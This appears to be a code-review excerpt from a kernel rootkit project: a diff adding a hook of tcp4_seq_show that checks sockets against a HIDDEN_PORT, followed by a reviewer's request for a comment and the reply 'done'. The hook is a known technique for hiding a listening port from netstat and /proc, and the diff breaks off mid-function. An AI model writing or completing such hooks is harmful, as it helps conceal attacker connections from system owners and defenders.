hook_functions/tcp_seq_show.c

```diff
@@ -0,0 +1,12 @@
+asmlinkage int (*org_tcp4_seq_show) (struct seq_file *seq, void *v);
+
+static asmlinkage int hook_tcp4_seq_show(struct seq_file *seq, void *v)
+{
+    struct sock *sk = v;
+
+    if (sk != SEQ_START_TOKEN && sk->sk_num == HIDDEN_PORT)
```

Comment:
add a comment explaining what exactly you are hiding here

Reply:
done